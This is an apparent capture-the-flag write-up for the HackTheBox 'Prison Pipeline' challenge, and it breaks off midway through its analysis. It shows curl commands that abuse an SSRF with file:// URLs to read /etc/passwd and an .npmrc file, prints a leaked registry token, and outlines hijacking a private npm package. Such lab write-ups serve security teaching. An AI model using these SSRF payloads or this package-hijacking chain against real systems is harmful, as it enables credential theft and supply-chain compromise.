Prison Pipeline

hackthebox_business_ctf_2024

Task: abuse an SSRF in node-libcurl-backed prisoner import to read local files and steal the private Verdaccio token. Solution: publish a compatible malicious prisoner-db update through a local Host-header proxy, let cron install it, then read the written flag back through file:// SSRF.

ssrf file_read nodejs supply_chain npm verdaccio node_libcurl cronjob

ssrf_file_readnpm_package_hijackingverdaccio_token_reusemodule_load_rce

$ ls tags/ techniques/

ssrf file_read nodejs supply_chain npm verdaccio node_libcurl cronjob

ssrf_file_readnpm_package_hijackingverdaccio_token_reusemodule_load_rce

$ cat /etc/rate-limit

Rate limit reached (20 reads/hour per IP). Showing preview only — full content returns at the next hour roll-over.

Prison Pipeline — HackTheBox Business CTF 2024

One of our crew members has been captured by mutant raiders and is locked away in their heavily fortified prison. During an initial reconnaissance, the crew managed to gain access to the prison's record management system. Your mission: exploit this system to infiltrate the prison's network and disable the defenses for the rescuers.

Summary

Although the original challenge was placed under misc, the reliable solve path is best understood as a web + supply-chain challenge: a web SSRF leaks registry credentials, then a private npm package update yields code execution.

The accurate exploitation chain is:

POST /api/prisoners/import is SSRF via node-libcurl.
file:// works, so local files are readable.
file:///home/node/.npmrc leaks the Verdaccio auth token.
Publish a newer prisoner-db package version to the private registry.
Cron runs npm outdated/update prisoner-db against localhost:4873 and restarts the app.
Malicious top-level package code runs on module load, calls /readflag, and writes the result to /app/prisoner-repository/FLAG.txt.
Read that file back through the same SSRF using file:///app/prisoner-repository/FLAG.txt.

Analysis

1. SSRF in `/api/prisoners/import`

The application imports prisoner data from a user-supplied URL. The underlying package uses node-libcurl, so this is not just HTTP SSRF: file:// also works.

That makes local file reads trivial:

curl -s -X POST 'http://TARGET:1337/api/prisoners/import' \
  -H 'Content-Type: application/json' \
  -d '{"url":"file:///etc/passwd"}'

The endpoint returns a prisoner id. Fetching that record shows the raw imported content.

2. Stealing the private npm token

The useful target is /home/node/.npmrc:

curl -s -X POST 'http://TARGET:1337/api/prisoners/import' \
  -H 'Content-Type: application/json' \
  -d '{"url":"file:///home/node/.npmrc"}'

The leaked token was:

//localhost:4873/:_authToken="MWZlMmI1OTRiZjMwNTJkMjYwNWZhYTE1NGJlNTVjZDQ6OGRjNDBlMDE3YWNhYjViYzEwM2RlOTQzYzg3OWZiN2YwY2EyZGI5ZmMwMGI4ZWViZWVhZmUzZjc0Y2I2MWFiOTZmNWI1OWVhNTg0N2IwZmIwZQ=="

This is enough to authenticate to Verdaccio.

3. Why the proxy method is the reliable one

...